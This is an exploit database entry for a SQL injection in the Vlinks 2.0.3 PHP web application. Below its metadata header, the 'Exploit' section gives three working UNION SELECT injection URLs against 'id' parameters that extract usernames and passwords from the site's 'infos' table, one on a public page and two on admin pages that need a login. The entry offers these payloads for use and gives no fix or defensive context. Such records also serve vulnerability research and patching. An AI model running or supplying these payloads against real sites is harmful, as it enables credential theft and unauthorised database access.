EXPLOITS

Vlinks 2.0.3 - 'id' SQL Injection

Author: JIKO
type: webapps
platform: php
port: 
date_added: 2012-08-27  
date_updated: 2017-02-13  
verified: 1  
codes: OSVDB-85946;OSVDB-85945;OSVDB-85939  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-27-at-91626-am.png  
application_url: http://www.exploit-db.comVlinks2.0.3.zip  

raw file: 20859.txt  

#########################################################################################
[!x!] Informations:

Name           : vlinks
Download       : http://www.vlinks.org/ =>http://www.vlinks.org/telechargements/Vlinks2.0.3.zip (And All Version)
Vulnerability  : Sql Injection
Author         : JIKO(JAWAD)
Contact        : jalikom@hotmail.com
Site           : No-ExploiT.CoM (Is Back)
Notes          : No-ExploiT.CoM Miss
#########################################################################################
[!x!] Bug:

Bugged file is /[path]/page.php?

[Note]
Pass Simple
[/Note]

#########################################################################################
[!x!] Exploit:

Exploit: http://no-exploit.com/forum/site.php?ps=1&idc=1&id=-991 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--

[Admin Panel] ! Need Login
Exploit: http://no-exploit.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
Exploit: http://no-exploit.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--

########################################################################################
[!x!] To: All friends
Cyber_Devil Allah with you

members [No-exploit.Com]